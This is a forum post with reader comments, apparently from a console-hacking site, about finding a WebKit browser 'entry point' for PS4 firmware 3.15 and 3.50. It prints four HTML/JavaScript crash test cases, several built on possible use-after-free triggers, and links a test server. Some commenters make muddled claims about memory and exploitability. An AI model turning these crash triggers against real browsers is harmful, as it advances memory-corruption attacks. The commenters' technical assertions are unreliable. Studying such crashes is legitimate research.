PS4 3.15 Firmware Entry Point for Testing from Zecoxao

Following the recent PS4 Dlclose Exploit for 1.76 Firmware, today I'd like to share a talk between zecoxao and Zer0xFF on finding an entry point for testing with PS4 Firmware 3.15 and also 3.50.

• http://2.83.228.148/totally_not_gachimuchi/

@zecoxao seems to be working on an entry point for the PS4 3.15 FW and wants some testers
1. Entry point:

<iframe></iframe><object onbeforeload="crash()">
    <script>
    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }

    function crash() {
        document.getElementsByTagName("iframe")[0].contentWindow.scrollX;
        document.open();
    }

    document.body.offsetLeft;
    setTimeout(function() {
        document.close();
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 1);
    </script>

2. Entry point:

<input id="t1" type="time">
    <script>
    var time1 = document.getElementById('t1');
    document.addEventListener('beforeload', function(event) {
        time1.value = time1.value ? '' : '23:59';
    }, true);

    if (window.testRunner) {
        testRunner.dumpAsText();
        testRunner.waitUntilDone();
    }
    setTimeout(function() {
        document.body.innerHTML = 'PASS if not crashed.';
        testRunner.notifyDone();
    }, 100);
    time1.focus();
    </script>
    <embed src="data:text/html,PASS"></embed>

Also the the source code from the Webkit from Sony

• EDIT / Update by B7U3 C50SS & source files from zecoxao & and a file server for accessing the PS4 Tests page - via, pasha4ur:
• You may also crash test your PS4 browser ATM on any FW from zecoxao's Github Page.

3. Entry Point:

<script>
function inituaf() {
  for(var i=0; i<100; i++) {
    for(var j=0; j<32; j++) {
    }
  }
  try { CollectGarbage(); } catch(err) {
    try { window.gc(); } catch(err) {
      for(var i=0; i<100; i++) {
      }
    }
  }
}

function eventhandler2() {

  try { var00002 = document; } catch(err) { } //line 2
  try { var00003 = var00002; } catch(err) { } //line 3
  try { var00043 = 0; } catch(err) { } //line 45
  try { var00044 = var00003.getElementsByTagName("iframe")[var00043]; } catch(err) { } //line 46
  try { var00045 = var00044.contentWindow; } catch(err) { } //line 47
  try { var00063 = -1; } catch(err) { } //line 67
  try { var00064 = 0; } catch(err) { } //line 68
  try { var00045.scrollTo(var00063,var00064); } catch(err) { } //line 69
  try { var00002.write(); } catch(err) { } //line 185
}


</script>
><object onbeforeload="eventhandler2()"><iframe>

4. Entry Point:

<!DOCTYPE html>
<html>
<body>
<iframe></iframe>
<script>

var _gc;

function run()
{
    var iframe = document.getElementsByTagName('iframe')[0];
    iframe.contentDocument.documentElement.contentEditable = true;

    iframe.contentDocument.documentElement.addEventListener('focusout', function () {
        iframe.parentNode.removeChild(iframe);
    }, false);

    iframe.contentDocument.documentElement.focus();
}
document.addEventListener('DOMContentLoaded', run);
</script>
</body>
</html>

 

[CnCore]

"but we don't know if it's exploitable or not. we need an expert in webkit."

Hmm who can help them.

 

[SorenAlke]

It's Exploiting the Crash now that the system will not run out of memory
Devs Want FULL R/W

 

[mcmrc1]

fisting poc ^^

need my plaaaystatttiiiooon i will also test this fisting hack

 

[SorenAlke]

out of memory means no bounds checking

means you can call userland code
if you can free memory from heap sucessfully

the crash is a poc that means we can run unsigned code

its actually exploiting past that point

where you can run your own code

without worrying

about memory consumption

that prevents r/w
people can try but im sure. they will find out the hard way
even if you manage one part theres always another roadblock
logically the crash is a good thing.

going deeper.
it may be too much trial and error to even bother with only to find out something dissapointing
i wouldnt keep your hopes up guys

if a emulator manages to run

great but looking at what we have now...

thats all webkit is good for.

unless someone is really really bored and wants to wrack their brains

 

[nightfire10]

so r we close to a cfw guys ? cause i dont know much of technical stuff.

 

[CnCore]

I dont think that we are close to a CWF, but I think this is the first step in the right direction for a exploid.

 

[Jeff]

You get also a out of memory message when you go to crashsafari.com
But that doesnt mean its a exploit.
There are different ways to get that message.
The allocated memory for the browser is very low.

 

[mcmrc1]

You get also a out of memory message when you go to crashsafari.com
But that doesnt mean its a exploit.
There are different ways to get that message.
The allocated memory for the browser is very low.

if you have twitter pls give @zecoxao this tip

 

[B7U3 C50SS]

I UPDATED THE THREAD.

 

[PSXHAX]

I UPDATED THE THREAD.

Much appreciated!